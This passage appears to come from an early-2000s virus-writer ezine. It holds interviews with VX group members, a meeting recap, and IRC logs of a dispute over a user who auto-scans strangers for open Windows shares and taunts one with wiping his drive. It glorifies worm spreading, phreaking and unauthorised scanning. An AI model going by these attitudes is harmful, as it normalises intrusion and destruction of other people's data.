I based some names from real life and I got motivation from real life. Everything is about real life issues in one way or
another.

What do you think about infected users?

I think they should remove the virus.

How do you think most people caught your viruses?

Probably with anti-virus programs.

I only know one person who caught one of my viruses ([Bad Attitude]). He saw "Immortal Riot" scrolling all over his
monitor and later became a very good coder and an Immortal Riot member.

Do you still occupy with computers a lot?

I work with computers, but in my spare time? Maybe an hour a week, to pay bills, write emails to friends and
ex-girlfriends and of course to annoy people with SMS :).

Is there anything else you want to mention?

Naw, not really.

Any greets or hate messages?

Greets go to everyone who has ever been mentioned in a positive manner in Insane Reality and of course to all of
Immortal Riot. Special greets must go to Metal Militia.

Thanks a lot for the interview :)

You're welcome.

Interview with Del Armg0/MATRiX

Interviewer: EXE-Gency

Give us a short description of who you are. (Handle, interests, occupation, music, films, location, marital status etc.)

I'm 27, lots of girls and one of my nicks in life is Fa, humm ... what's more...¿ I'm somebody very curious in fact... lots of
hobbies (vx, phreak, short-wave listener, role-playing-game, playing electronic music too, astronomy, ... i'm happy
when i'm learning in fact ;) Some of my favourite films are "Eraserhead", "CryingFreeman", "Buffet Froid", ... And i
luv music-bands like "stereolab", "gong", "bauhaus", ... and many more !

What made you choose your handle?

lots of ppl have asked me about it... it's "simply" a name from an AD&D campaign (over 6 years!), there was a
character i played as dungeon master, she was called "Larynda Nedylene Barrisson Del'ArmgO", it was a famous
Martial Drow family, and a very fun game, so... i kept the name.

Have you ever had any previous identities in the computer underground?

nop, i've been known as Del_Armg0 since i started, but it's true that for some viral experience i sometimes use another
nick... it's rare. But since the JC'Zic bust, i prefer to be discreet... sometimes.

When did you first get into computers?

I started on an Amstrad CPC 464, and a Thomson MO5 !!! It was really shit but really fun. After that i met the Atari
world, and it was a great moment. The Atari 520/1040 ST was really great. And in 1996, i bought a PC under Windows...
humm no comment!

What operating system(s) are you currently running?

I've a first 'puter with Win95, a 486 with a Russian DOS (a graphical DOS) called PTS-DOS 6.70 and Win 3.1, i like it a lot.
And i'm still using an Atari 1040 (TOS). At work i'm using Win NT, just shit! I hope i will try Win2k soon, i'm sure it
will be a great OS for Vx ;)

How and when did you first discover the computer underground?

Humm... a bit "just like that", i had bought a modem to meet or know more about Underground Electronic ppl... and
it's easy to find evil on the Net ;]

How did you first get into virus programming?

I started coding to make viruses, but i guess the first idea to make a virus came from the first virus i discovered when i
was younger, it was really new. And lots of hype was made around it. It was a CPC virus, but i've forgotten the name, the
fascination is still here.. Probably some movies like "Wargames" or "Tron" are important in the story...

Do you have an interest in the other components of the computer underground? (hack/phreak/warez etc.)

Yep. I'm a great fanatic of phreaking, it's a really great and fun "game". The phone network is full of marvellous things...
and i'm lucky, i'm now working in the phone network. Hacking is cool, but sometimes too full of "big-EGO-people",
so i prefer to try it alone.

Do you consider yourself to be a criminal?

Really not ! But here in France, it's really easy to be one, and for cops i'm probably one... (drugs, phreak, vx, ... it's just
fun life). But why are all the cool things in life illegal !!!?¿

Do the laws in your country make writing viruses illegal and have you had any trouble with the law in your country?

Yes, laws here are very bad for H/P/V; i've never been busted and i hope i won't be! But i'm sometimes tired of being
paranoid when i'm connected... (proxies, wingates and other anonymisers...). Sabia is probably the worst spreading i
did, and my ISP left me.. arrgghhhh! ... but ..but Viva phone S.E. ;)

Do your friends/family/colleagues know about your interest in the computer underground?

Yep, some of them know about it, but really few. It's a bad idea to talk about it because when u send a mail to your
friend, he's always afraid ;), and 99% of mass ppl really don't care about vx, so...

What are your opinions on virii with destructive payloads?

I never did it, cos i don't like it very much... I guess some coders are good coders, but not really imaginative... Viruses
are artworks, but destruction can be art, so...why not... It's a really great and endless debate, but to my mind, a
destructive program is not really a virus. A virus must spread and spread, so why kill the host and kill itself at the
same time ?

How did you get involved with the Matrix virus group?

mort was a good electronic friend, some groups asked me to join, but i was not interested, i said it to mort, and so
he asked me to join MATRiX, this time i said "ok".

Does the Matrix group concern themselves with virus programming only or do they have an interest in other
underground topics?

Actually MATRiX concerns only virus coding, but i hope i can introduce some other subjects like phreaking, trojans,
hacking, ...

Have you been a member of any other groups?

Nop, and i never thought of being in a group, i liked to be alone; but it could be a good experience (and mort is a
really good friend).

Why did you start learning to program? Was it because you wanted to write computer viruses?

i started to program in 1998 with Delphi, and yes i started learning to program to write viruses/trojans. Quickly
i learned asm, i still have to learn asm32 (i've started). I like a lot to learn some toy or silly languages like VB, VDscript,
batch, rebol, javascript,...

What other languages can you program in?

Delphi/Pascal, Asm/Asm32 for serious coding; Vba/Vbs, html/wml, and some other scripting languages for silly
things. I find Rebol very interesting too (31 platforms !!) I like toys like PcomP, VDS, M:POSTER,...

What do you think of viruses written in languages other than assembly?

i like it! hehehe! Yes, i like all viruses, worms or trojans. Some of them are really nice and ingenious but not in asm; too
many virii are variants of a variant actually, probably cos of the big number of asm sources on the Net.

What is the best/favourite virus you have written so far?

Wooo! Really hard...! but IRC-Worm.ElSpy.2278 & .9619 were great worms at the time, they were my very first, and they
had some cool features. i liked a lot my script generator too, called "SENSI". And my prog "Bundy" cos' of the silly
splash screen.

What groups do you value most highly?

I guess 29A is one of the most prolific and original groups of the present time. Perhaps even too present.. i liked
Phalcon-Skism, Immortal Riot, SLAM ... but it's a bit old..skool

Which individual programmers (both past and present) do you value most highly?

Wooo, really hard to answer! But i like legends like DarkAvenger and stories like that. The Bulgarian Myth is great. The
texts about it are nice novels.

What zines do you read regularly?

Really a lot! I read almost all E-zines about Vx and Phreaking, i read some French Hacking zines too.
(www.madchat.org) Cool H/P zines are PyroFreak, IGA, Hackoff, ... ... ... For Vx Zines, 29A & Vxtasy are perhaps the
best (after MATRiX zine, of course:)

What do you think of the virus scene? (Both in general and in your own country.)

I know the vx trading scene well, and there is too much politics... About the vx scene, it's a cool place, but too many
young people don't want to see that in vx coding there's an EGO part. Hahahaha! I have some electronic friends, but
i'm sometimes a bit away from the vx scene.

How has the underground scene changed since you first entered?

The scene has changed yes, but the scene changes so fast. Guys appear, disappear,... But since the beginning i've kept
some good electronic friends in the vx scene, it's enough for me. (booohh Phage!;(

What do you think the future of virus writing holds?

It will depend on different things, like the OS. If Linux becomes the main OS it will be a revolution for vxers, probably the
scene will be totally changed. And the more networks and networking applications appear, the more worms come too. So the
future of the virus is more in the hands of mass ppl than in our hands.

Do you believe in a 'perfect virus'? And if so describe it.

A Worm of course :), Joke! But i really believe that the future of the virus is in the worm properties. The next
generation of viral code must have abilities to infect the new hardware (like mobile phones) and spread using new
protocols. WAP networks, GPRS and UMTS protocols will be used by phones and tiny computers, the virus will have to
use worm techniques to spread between phones, computers and other Palms & Psions. I like the idea of an Autonomous
Mobile Cyber Weapon (AMCW) too. The perfect virus will have to use the main worm features, will know and find its
target and infect files traded by network users (like pictures, ...yes my dream would be to infect .jpg :)

What advice would you give to newbies entering the virus scene?

download, print, read, download, print, read, download, print, read, ... After 6 months like that, come on Irc to meet
some ppl and code, code, code, ... A good thing is really to learn the maximum possible things, learn some languages,
learn about OS, learn about protocol, learn about people, learn, learn, learn, ...

What language should a newbie learn if he wants to start writing viruses?

It depends really on the newbie, learning Asm first is good to learn some universal maths/coding theories, after Asm all
other languages seem easy, hehehe. But the better thing to do is to try them all, to learn again and again. All languages are
good if u really know the language, the hardest is perhaps to find THE language.

Anything you would like to add?

I guess no, lots of things have been said. And i'm not somebody very talkative (gossipy?) cya.

Any greets?

Yes a lot!!! Greets to : Phage, Perikles, VirusBust, MATRiX team, HomeSlice, Daniel3 Lyskovick, Secret_- Trov,
ArteMuse, pbat, mort, Ultras, NBK, TGR, LordDark, Anaktos U, Iblis, W0de, FreDyKrug, Elsa, MelanYe,Roadkill,
Zulu, Mist, Urgo32, me, hashish, all!

Any plugs? (Homepage, email address etc.)

Sure !
mailto: delly@fr.st
http://www.delly.fr.st
http://www.coderz.net/matrix

VX meeting 2000 in Czech Republic:
Opinions of a few VXers

Interviewer: Gigabyte

First week of August, quite sunny, boring IRC channels.. the ideal moment for the yearly VX meeting. While
AVers were probably thinking all VXers were sitting in their rooms, with a computer, avoiding the sun and
giving dumb users a hard time by writing new viruses, some of us were in fact having a great time in Brno,
Czech Republic, getting drunk, stoned, even getting some suntan and sticking 'GriYosoft' papers all over the
city. If we still remember anything? I sure do! Let's see what the guys have to say..

Did you enjoy the meeting?

GriYo: Oh, if... I always enjoy in all the meetings that we organize in summer.
I always find there great dudes ( and dudettes :-P ) and also new places, so i can get my hands out of the keyboard for
some days.

Benny: ABSOLUTELY YES!!! I can say it was one of the best timez in this year... you dont think so?

mort: sure, i met ppl who i've seen only on chat

Ratter: of course. it was my first VX meeting in my life and i met great ppl there which i knew only on Internet. It was
a great time for me. One of the best in my life...

Did there happen anything funny that you remember?

GriYo: I had fun one day we went to a big park in Brno... I had brought a little bit of hashish from Spain, and we
were smoking... We don't take in beginning to say foolishness and to laugh without stopping, it was really funny.

Benny: Yeah, sure. GriYosoft action. all city was full of posters :) and i will never forget how you, GigaByte, got
absolutely stoned and drunk, hehe.

mort: yea,... giga and beer :)

Ratter: yeah of course :) talking with you Gig XD

Anything you missed there?

GriYo: Mmmmm... no.


Benny: Yeah, I expected there will come more ppl from foreign countries. nevertheless, it was really very kewl
meeting, I had really fun.

mort: more ppl

Ratter: yeah i missed darkman there. and other ppl that do VXing

How often did you have a hangover?

GriYo: Well, we had a hangover every morning... I thought that i was accustomed to drink a lot of beer, but I was
wrong, eh Benny? ;-))))

Benny: almost every morning...:P but three or four beerz in the morning helped me a lot to forget :)

mort: hehe,... no comment

Ratter: I don't have hangover after weed :) and i didn't drink a lot

[Comic strip: Kevin & Kell, by Bill Holbrook]

What follows is the result of a run in I had with a seriously stupid
IRCop of Undernet. If you, the reader, don't know or understand shared
drives and net.exe, this entire file will be one boring read for you.
For the rest of us, it's funny as hell... Definitely a keeper if I do say
so myself :]

I don't have the logfile handy of my original conversation with
chaplain, nor the logfile earlier that day this shit went down, because
I don't log from work. I turned on buffer save after CiCi made her
threat, otherwise I wouldn't have proof of that either. However, I do
have some wonderful emails; and the entire log of CiCi and myself
chatting the next day. Now then, on with the show...

Start of #Christian buffer: Fri Sep 08 16:14:38 2000


ne.no) has joined #Christian
<Latte> hello :)
<TremorX> Hiya
<chatcat> i need chocolate
<Latte> how are u
<TremorX> Great.. yourself?
<chatcat> gotta go look throuhg all
the chcoclate stashes i know about
<chatcat> laters
*** chatcat has quit IRC (*MEOW*FWACK*H
ISS*WHACK* "you're right... there
ISN"T enough room to swing a cat in
here...")
*** ionxy has quit IRC (Ping timeout
for ionxy[194.102.79.136])
<Latte> some down, my late wife's
brother passed away last nigt
*** AxeAshes has quit IRC (Baltimore-R.
MD.US.Undernet.Org Seattle.WA.US.UnderN
et.Org)
<TremorX> That's a shame... it's
always hard to lose someone you're
close to.
<Latte> yes it is, it was cerebral
haemorrhage if you understand my
english
<TremorX> Yeah
*** AxeAshes (AxeAshes@63.160.115.29)
has joined #Christian
<Latte> but what people tell us, they
say life must go on, they said that
to me when my wife passed away
<TremorX> The problem with that would
be trying to get your Mass Air
Sensor to register properly. I
suppose it COULD be done, but you'll
need to add at least a small section
of pipe where you can mount it, and
then you run a chance of the airflow
being wrong. Of course, you could
always acquire another stock airbox,
do some cutting, get some hosing and
try it. No harm in trying, so long
as your car still works if you mess
up!
<TremorX> --TremorX
<TremorX> ack!
<TremorX> sorry
<TremorX> good thing that's all that
was on my clipboard :P
<TremorX> j/k
* TremorX drops a pin
<patience_> hehe
-> *lc* You think a lawyer is going to
help you bro? Open shares is your
problem...
*** chatcat (~chatcat@kruse.fwi.com)
has joined #Christian
*** Nuts (dnut@P29.ASC-MB06.QZN.SKYINET
.NET) has joined #Christian
<JadeGA> l8r :)
<TremorX> Bye hon
<TremorX> *smooch*
<JadeGA> see in little while ;)
<TremorX> ya
*** JadeGA (Jade@pm2-34.btconline.net) has left #Christian
<ZoOrOpA> husband and wife?
<TremorX> Not yet :)
<TremorX> Close enuff tho
*** Latte has quit IRC (Leaving)
*** Latte (hpg@ti02a22-0125.dialup.online.no) has joined #Christian
*** Nuts has quit IRC (Ping timeout for Nuts[P29.ASC-MB06.QZN.SKYINET.NET])
*** Nuts (dnut@216.250.192.17) has joined #Christian
*** TremorX has quit IRC (Connection reset by Janet Reno)
*** chatcat has quit IRC (Ping timeout for chatcat[kruse.fwi.com])
*** Melv\Mike (~oldage@p152-tnt1.ham.ihug.co.nz) has joined #Christian
*** JnetyBabe (CollegeGrL@dialup-63.212.138.179.LosAngeles1.Level3.net) has joined #Christian
<JnetyBabe> can anyone tell me where to look in the bible......
<JnetyBabe> where it talks about sucide and how it makes you go to hell ?
<Raid> I think if you commit suicide you'll goto hell for it, yes.
<Raid> But don't quote me on it, I don't know for sure.
<patience_> it doesnt talk about suicide specifically
*** AxeAshes has quit IRC (<<-NE><GEN·ACiDMAX->> ©1998, KnightFal www.europa.com/~colin)
<Raid> patience_: the bible seems to have a real problem with specifics...
<patience_> not all the time
<patience_> only a few things
<Raid> a few things?
<Raid> according to the bible patience, how old is this planet?
<Raid> a few thousand years?
<patience_> in my opinion
<patience_> wel *i* think about 10000 years or so
<patience_> i'm not exactly sure
<Raid> 10,000 years eh?
<patience_> but theres no verse in the bible that says " the earth is so many years old"
<Raid> Geological Science says she's a hell of a lot older then that.
<patience_> Raid maybe a couple 1000 less
<patience_> ya well
<Raid> by a few million years or so.
* patience_ needs food
<patience_> well i dont believe that
<Raid> We know alot more now then we did in the 1800s :)
<Raid> Do you believe dinosaurs roamed the earth at one point?
<patience_> they could very well have
<patience_> cos they couldda gotten destroyed in the flood
<Raid> could?
<Raid> ehm.. No
<Raid> they did.
<ZoOrOpA> Raid:my mother in law does
* patience_ cant debate because i dont have enough knowledge
<ZoOrOpA> j/k
<ZoOrOpA> j/k
<Raid> DIdn't god claim we were the first?
<patience_> you calling your motheri n law a dinosaur? lol
<Raid> Well, how can we be the first on this planet, if the dinosaurs were here and long gone?
<ZoOrOpA> patience_"im not married...i was trying to be funny
<ZoOrOpA> ;]
<Raid> adam and eve, then they furry little animals...
<Raid> No mention of dinos..
<Raid> Yet, we have real evidence that they existed.
<pSyk_> lol
<patience_> heh
<Raid> like there huge skeleton remains, and the fuel I paid almost 2.00 a gallon that runs my truck.
<pSyk_> RaidSTX:STX don't forget, xians don't understand that carbon dating is valid.
<patience_> well God didnt name every single creature He created in Genesis
*** CookieMix (HS17pro@host212-140-40-32.btinternet.com) has left #Christian
*** `Pegasus (Nons@HSE-QuebecCity-ppp82042.qc.sympatico.ca) has joined #Christian
<pSyk_> maybe dinos died out after jesus was crucified.
<Raid> But he did specifically say We were first right?
<`Pegasus> hi a;;
<`Pegasus> hi all
<patience_> hi `Pegasus @
<Raid> The dinosaurs have been LONG gone.
<patience_> umm
<patience_> God created animals maybe first
<pSyk_> yes he did.
<`Pegasus> hi patience :)
<pSyk_> no no
<pSyk_> read the genesis
<patience_> but we were around too i reckon
<patience_> anyway
<`Pegasus> Psyk: You still here?
<pSyk_> god said he created man frist than woman than animals
<Raid> patience_: What about cave men?
<patience_> we all have our own opinions
<Raid> patience_: You can't claim this is my opinion, Dinosaurs roamed this planet.
<pSyk_> they found human remains that date 40,000 years ago...
<`Pegasus> Hi zooropa!
<Raid> it's a fact.
<ZoOrOpA> `Pegasus :]
<Raid> Fossil fuel...
<patience_> well they SAY they are 40000 years old
<patience_> i dont believe it
<patience_> ANYWAY moving on....
<pSyk_> haha
<Raid> real skeletons, some complete.
<Raid> patience_: Not moving on, I like this topic.
<pSyk_> patience_ why not? have you researched carbon dating techniques?
<Raid> and there isn't anything wrong with this topic...
<Raid> it's legit.
<patience_> well i've heard that they can be wrong
<pSyk_> patience_ do you think you are brighter than the scientific community which relys on carbon dating?
<patience_> i heard of particular incidents
<patience_> pSyk_ i didnt say i was
<patience_> i believe God
<Raid> patience_: Where do you believe the gas you put in your car comes from?
<patience_> anywho
<patience_> i'm starvinh hungy
*** Latte (hpg@ti02a22-0125.dialup.online.no) has left #Christian
<patience_> need some food
<Raid> question too difficult to answer or something?
<Nuts> eat well patience
<patience_> i just dont feel like answering em either
* pSyk_ shrugs.
<patience_> but its almost 10pm and i havent had supper
<CiCi> Raid you're about to get your lil tail in alot of trouble from what I'm seeing
<pSyk_> patience_ it's ok. there is no way you can answer that question and have faith in god at the same time.
<CiCi> I suggest you stop threatening people with attacks before I remove you from Undernet
<Raid> patience_: A science lesson for you. The fuel our cars run on is from rotted dino bones. Which took millions (not thousands) of years to produce.
<Raid> CiCi: for?
<Raid> CiCi: Ehh, Who have I threatened ?
-> *CiCi* enlighten me, Whom have I threatend since I've been here?
*** patience_ is now known as pataway
*** dreamweb has quit IRC (Ping timeout for dreamweb[213.108.36.228])
<CiCi> Raid you may only be a teenager, but you've no involved yourself in a problem with the authorities
<CiCi> I'll let them handle it, but a word of advice would be to judge who you threaten more carefully
<Raid> CiCi: Listen, I'm not a teenager.. and I don't think the authorities are going to do anything about me.
<Raid> CiCi: But if you know something I don't, I;d like to know about it.
<CiCi> Raid when you threaten to do damage to someone's computer system, and you dare them to take legal action, rest assured, they WILL do that
<CiCi> and don't act like you have no clue what's going on here
<CiCi> that's the end of my discussion with you, you can talk to an attorney
*** CiCi (~ci@fearnot.iadfw.net) has left #Christian
<pSyk_> wow
*** RoadRunnr (~Nessa@p232-tnt8.akl.ihug.co.nz) has joined #Christian
<Raid> uh huh
<pSyk_> ud' think god came down and shoved a red hot poker up his bummhole
*** MarySue (abbi@p113-tnt1.ham.ihug.co.nz) has joined #Christian
<Raid> I didn't threaten him, He had a real open share on his box.
*** logos3 sets mode: +o RoadRunnr
<Raid> thats HIS fault, jerk
<pataway> allrighty pSyk_
*** dreamweb1 (~peter@213.108.39.116) has joined #Christian
<pataway> i think u should leave
<`Pegasus> hi Road!
<RoadRunnr> hi..
-> *dan_* what the fuck is with cici?
*** pSyk_ was kicked by RoadRunnr (pSyk_)
<pataway> hi roady
*** pSyk_ (psyk@endless.efortress.com) has joined #Christian
*** RoadRunnr sets mode: +b *!*@endless.efortress.com
*** pSyk_ was kicked by logos3 (Banned)
<dan_> *s*
<`Pegasus> thanks rr!
*** Karentra (karentras@A020-0276.TAMP.splitrock.net) has joined #Christian
<pataway> ta roady
*** Karentra (karentras@A020-0276.TAMP.splitrock.net) has left #Christian
*** RoadRunnr sets mode: -o RoadRunnr
<pataway> i would ahve done the honors myself but logos well.... yah
<RoadRunnr> what a way to start the day..
<Raid> I don't beleive this BS...
<pataway> hi MarySue !!!!
* pataway willl BBL
<Raid> I tell somebody they have a security problem, and I'm reported to the authorities?
<MarySue> patience : ))
<pataway> Raid i think she referred to what you said to LC when you were here earlier
-> *cici* You want my logs of christian ? I didn't threaten your friend chap. I told him he has an open share and he's vulnerable, I did nothing to his computer.
<RoadRunnr> eh?
<Raid> pataway: HE has an open acccess to his computer, Ok?
<pataway> anywho
<pataway> she = CiCi
<Raid> pataway: With that, anybody can access his hard disk.
<`Pegasus> what?
<RoadRunnr> Raid, are you saying what i think you are saying?
*** MarySue is now known as MarySafk
<ZoOrOpA> DAN!!!!!!!!!
<RoadRunnr> we don't tolerate threats in here
<Raid> RoadRunnr: grrrr.
<Melv\Mike> MarySafk
<Raid> RoadRunnr: damnit dude, listen to me. I warned chap he had an open share; I didn't DO ANYTHING TO HIM.
<ZoOrOpA> dan_?
<Melv\Mike> RoadRunnr: Oh yeah? what are you going to do about it?
<`Pegasus> Are you guys saying he can access my HD?
<RoadRunnr> okay, lets move on then :)
<Raid> `Pegasus: If you had an open share, anybody could.
<pataway> i dunno what an open share is lol
<`Pegasus> Raid: what port does that use?
*** Pipetobak (Beard@as1-dial94.flnt.mi.voyager.net) has joined #Christian
<Pipetobak> Yo!
<Pipetobak> !rsv lev 16 13
<`Pegasus> hi
<logos3> Pipetobak: Lev 16:13 "13 and put the incense on the fire before the LORD, that the cloud of the incense may cover the mercy seat which is upon the testimony, lest he {die;}" (RSV)
* Pipetobak reaches into the breast pocket of his flannel shirt and extracts a well worn, and well appreciated briar pipe. Meticulously he fills the pipe with delightful crumbles of leaf and gripping the stem of the pipe with his teeth, he strikes a match. The creamy, dense, vanilla tinted smoke is rich and delightful and he inhales it deeply with relish as he glances about looking for interesting conversation.
<Pipetobak> Peg!
<`Pegasus> hi pipe
<RoadRunnr> hiya Pipetobak
<Pipetobak> Roadrunner!
<RoadRunnr> Raid, how have you been anyhow?
[`Pegasus:#Christian PING]
*** ZoOrOpA (ash@ak-d156.actrix.co.nz) has left #Christian
<`Pegasus> anyone?
<Nuts> huh?
<`Pegasus> ok :)
<`Pegasus> I tought I was alone
<Nuts> you're with a nut
<RoadRunnr> lol
<RoadRunnr> and a RR
<RoadRunnr> but i am not staying
<Nuts> hehe
*** i8dog (thouartgod@supernal.godsey.net) has joined #Christian
<`Pegasus> lol
<Raid> RoadRunnr: Pretty good, But I'm losing my opinion of the undernet ircops intelligence.
<i8dog> hello good people of CHRIST.
<`Pegasus> uh oh
<Raid> no offense dan ;p
<`Pegasus> i8dog?
<i8dog> hello
<RoadRunnr> is dan awake ?
<`Pegasus> whats wrong?
<`Pegasus> I see
<RoadRunnr> hmm?
<RoadRunnr> whats wrong?
<`Pegasus> Raid: Thats not very nice to say
*** MarySafk is now known as MarySue
* i8dog opens the bible and starts reading.
*** Kozubchik (orthodox@166.82.142.145) has joined #Christian
<RoadRunnr> lets move on from that, okay
<`Pegasus> wb marysue
<RoadRunnr> hiya MarySue, i8dog and Kozubchik
<i8dog> hello roadrunnr.
<Kozubchik> Hey Road
* i8dog reads fevershly looking for answers.
<MarySue> *Hugs* RoadRunnr
* RoadRunnr ain't staying.. am on the expensive isp
<`Pegasus> You know what guys, this place is getting too weird today. I think Im gonna come back later.
<RoadRunnr> just sending some mail
<`Pegasus> God Bless you all
<RoadRunnr> bye pegasus !
<`Pegasus> bye bye RR
*** `Pegasus (Nons@HSE-QuebecCity-ppp82042.qc.sympatico.ca) has left #Christian
*** atman` (surge@129.137.133.233) has joined #Christian
<i8dog> take care peg... don't let the yellow dots make your head purple.
<atman`> anyone ever hear from Petrus, who used to hang out here?
<MarySue> atman` !!!!!!!!!!
<RoadRunnr> yeah, he still pops in
* RoadRunnr double blinks.. atman?!
<RoadRunnr> *logos3* petrus was last on IRC channel #christian 2 days, 18 hours, 11 minutes ago.
* JnetyBabe wakes up
<atman`> hi RR
<i8dog> raid rules.
<MarySue> atman` he's here every now and then
<atman`> ah, ok, just was thinking about him :) Thanks!
<Kozubchik> Pray unto God for Thumps and his Loved Ones, O holy God Pleaser St Michael the Archangel, for we all need to fervently flee unto thee, the speedy helper and intercessor for our souls.
<JnetyBabe> later all...
*** JnetyBabe (CollegeGrL@dialup-63.212.138.179.LosAngeles1.Level3.net) has left #Christian
<MarySue> atman` I think Colin^ talked with him a couple of days ago : )
<atman`> thanks Marysue & RR
<atman`> :)
<MarySue> <---- is abbigail, remember me, atman`???
*** atman` (surge@129.137.133.233) has left #Christian
<MarySue> guess he does ... lol
<MarySue> ; )
<RoadRunnr> lol.. wierd
End of #Christian buffer Fri Sep 08 16:14:38 2000

The next day, I begin to talk to her.. Here's that log. :)

I dub this, "The undernet funny"

Session Start: Fri Sep 08 23:01:35 2000
Session Ident: CiCi (~ci@fearnot.iadfw.net)
>/whois cici
CiCi is ~ci@fearnot.iadfw.net * God Can!
CiCi on #christian
CiCi using dallas.tx.us.undernet.org www.airmail.net
CiCi is an IRC Operator
cici End of /WHOIS list.

<CiCi> why?
<Raid> I don't think you quiet understand what you erm, reported me for. heh
<Raid> Mr chaplain had open shared drives. I didn't do anything to him, I told him it was
there; I even directed him to a website for zone alarm. (firewall; fixes that problem)
<Raid> I told him if I was a jerk as he said, I would have formatted him.
<Raid> I didn't do so. hehe
<Raid> I didn't "hack" him or anything.
<Raid> His computer isn't setup properly.
<Raid> His entire c: drive is wide open to anybody; even you.
<CiCi> ok, let me go read these logs again with that in mind, brb
<Raid> So when I'm contacted by the authorities, (they already know about this serious
security problem.. ) they'll probably get a chuckle out of it. As I told chaplain he had
this problem, if I was a jerk; I wouldn't have said a word.. just done mean things to him.
<Raid> thanks.
<CiCi> [13:29] (Raid): LC: So consider that a threat, lamer.[13:29] (Raid): LC: So consider
that a threat, lamer.
<Raid> Are you going to use the entire log, or out of context?
<Raid> I have no need to threaten CiCi. I could have kept my mouth shut.
<Raid> then anybody (even you) could access his entire system.
<Raid> and use it like you were sitting at the keyboard.
<Raid> I thought he might like to know about it.
<Raid> Next time I find somebody has this problem... shrug, I'll just keep quiet. I had no
idea you didn't know about this serious problem with windows machines.
<Raid> NT suffers from it as well.
<Raid> in fact, everytime you reboot; unless you manually set it otherwise, drive c: is
shared as open, with admin rights, no password.
<Raid> listen, if you really don't believe me, You can ask anybody you trust with computer
knowledge to checkout this log of our chat.
<Raid> I'm not bsing you.
<Raid> I was trying to save you some shame is all.
<Raid> (My boss thought it was funny as hell.)
<CiCi> you were trying to save me from shame?
<CiCi> heh
<Raid> erm, embarrasment rather
<Raid> it's not normal for an admin to not understand shared drives. ;p
<Raid> and you are an administrator. hehe
<CiCi> if your boss had a copy of your logs I don't think he'd think your actions were funny
<Raid> Admins are supposed to know these things, and if they don't check it out first.
<Raid> Actually, he was standing beside me the entire convo; including the one with chaplain.
<CiCi> if you were trying to help, that's one thing, but you were threatening and that's not
right
<Raid> He didn't believe me when I told him YOU were an ircop of undernet.
<CiCi> if you recall, you tried that same mess on me when you first met me
<Raid> I had to /whois and show him your "is an ircop" thingie.
<Raid> Listen, I had access to his computer, why threaten? Nothing he could do at that
point. he was mine for the kill if I wanted it.
<Raid> Instead, I told him he had a problem.
<Raid> and explained (which you did take out of context) that if I was a jerk, I could
easily format /u his hard disk, or even quicker, nuke his fat or registry.
<CiCi> why were you looking anyway?
<Raid> oh and btw, I'm not a teenager; or a script kiddy, I don't have any reason to bs you.
I'm perfectly capable of backing up what I say.
<Raid> I wasn't.
<Raid> My script autoscans people on joins, much like undernet does for open proxies.
<Raid> You might want to recommend undernet do this scan hehe
<Raid> it's even more serious to a users data then an open proxy.
<CiCi> uhm no
<CiCi> undernet isn't a nanny service
<Raid> Shrug, as I said... if you don't know about something, Check it out before accusing
me of doing something bad. I've been clean for almost 8 months. Haven't hacked a single thing.
<CiCi> the only things we look for are things that damage this network on a large scale
<CiCi> the admins would NEVER agree to such scans as yours done to all guests
<Raid> if they all knew about the bug in windows, I bet you they would.
<CiCi> now, I"m tired of you insulting me
<Raid> I'm sure some of you ircops login with windows boxes.
<Raid> I'm not trying to insult you.
<Raid> Actually I find you one of the cooler ircops i've talked too.
<Raid> I realize I may sound like a smartass; But it's seriously not intentional.
<Raid> I simply want to resolve this issue with you.
<Raid> I'm not worried about the authorities.
<Raid> I just don't like people thinking I've done something i didn't is all.
<CiCi> you scanned someone's machine and then said
<CiCi> [13:29] (Raid): LC: So consider that a threat, lamer.
<Raid> My script scanned him when he joined.
<CiCi> I haven't changed my opinion of your immature behavior
<Raid> hmmm
<CiCi> if you honestly wanted to help people by doing this, you wouldn't call them lamers
<Raid> Did you get the entire log, or just what I said to him?
<CiCi> do you have any clue what percentage of our undernet guests I could call lamers?
<Raid> IE: the first thing he said to me?
<CiCi> alot of them, but I don't
<Raid> I was minding my own business, he smarted off. I decided to tell him in open channel
(I was writing /msg to him) that he had a problem.
<CiCi> perhaps a lack of communication skills is the problem, I don't now, but I do know
that what you did was not good
<Raid> If I was immature as you seem to think, I'd have chewed his hard disk up right before
his eyes, and said nothing.
<CiCi> *shrug*
<CiCi> ahhh so he "smarted off" so you thought you'd put him in his place? that's typically
something a kid does
<Raid> a kid?
<Raid> No mam, A kid would have formatted him the second they were told an open share was
found.
<Raid> or stolen data or something.
<Raid> I told him about it, and since he was being a wiseass; I told everybody in the process.
<CiCi> pftt
<CiCi> that was very nice of you...... not
<CiCi> and that's my point
<Raid> would it have been nicer not to tell him?
<Raid> so somebody WITH the intention of harm could take advantage?
<CiCi> would have been more civil if you hadn't tried to act l33t with him
<Raid> I didn't try to act l33t.
<CiCi> and because you decided to show off and make a fool of someone, you made a mess
<Raid> I made no such mess, A misunderstanding of what exactly I did made a mess.
<Raid> Chaplain I bet didn't mention we go way back did he?
<Raid> I didn't show off, I already had the blasted privmsg typed... He decided to be a wise
one... So I cancelled it, and wrote a new one.
<CiCi> alot of people can hack, most of us don't, and most of us are mature enough not to
have a temper fit and announce a problem
<CiCi> enough
<Raid> Alright, fine. You don't believe me.. That's perfectly ok. All you need to do is
check ANY search engine (or even micrsoft) for the fix for this problem.
<Raid> they'll even tell you it's not a hack.
<Raid> it's a bug.
<CiCi> most invasions are bugs
<Raid> erm, I didn't invade him. Script checked for open shares, didn't establish connection
or map anything.
<Raid> it's no more intrusive then proxy scans. Users don't even notice it, and it doesn't
show up as an attack on any firewalls either; because it isnt.
<CiCi> *sigh* I'm finished with this now, you're wrong to threaten people, end of story
<Raid> ugh... Well, checkout what I said if you get a chance.
<Raid> and goodnight n stuff.

From John Grahms Sat Sep 9 10:07:29 2000

Received: from [205.245.107.244] by web1610.mail.yahoo.com; Sat, 09 Sep 2000 10:07:29 PDT
Date: Sat, 9 Sep 2000 10:07:29 -0700 (PDT)
From: John Grahms <raidslam@yahoo.com>
Subject: Hello
To: abuse@undernet.org
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Length: 9146

Hi there. I thought you might like to know you have
one stupid ircop on undernet. Not only is she stupid,
but it's impossible to explain anything to her.

Her name is CiCi, and I just got klined for "hacking".
Full log follows. If you could deal with this for me,
I'd appreciate it.

Banned *@kpt-c-205-245-107-244.chartertn.net[1] until
Sat Sep 09 05:57:09PM 2000 GMT [968522229]: this is
not a playground for you to port scan and invade
other's machines .

Heres my kline (I went out to get some food, she
klined me when I left) Heres the log of all channel
activity up to my kline.
[12:25] *** Now talking in #CHristian
